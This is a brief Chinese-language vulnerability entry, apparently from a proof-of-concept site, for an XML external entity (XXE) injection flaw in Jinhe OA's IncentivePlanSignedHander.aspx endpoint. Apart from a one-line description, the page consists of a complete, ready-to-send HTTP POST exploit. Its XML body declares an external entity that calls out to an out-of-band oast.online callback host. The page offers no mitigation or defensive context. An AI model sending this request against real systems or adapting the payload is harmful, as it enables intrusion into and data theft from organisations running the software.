金和OA IncentivePlanSignedHander.aspx 存在XML注入漏洞

日期: 2025-10-22 | 影响软件: 金和OA | POC: 已公开

漏洞描述

攻击者可构造恶意请求获取敏感信息。

PoC代码

POST /c6/JHSoft.Web.IncentivePlan/IncentivePlanSignedHander.aspx/?type=saveitemjudgement HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 158
Content-Type: application/Xml
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://d3qqel9lt95jmc599a70ri18fy3dbxbbf.oast.online" >]>
<value>&xxe;</value>

相关漏洞推荐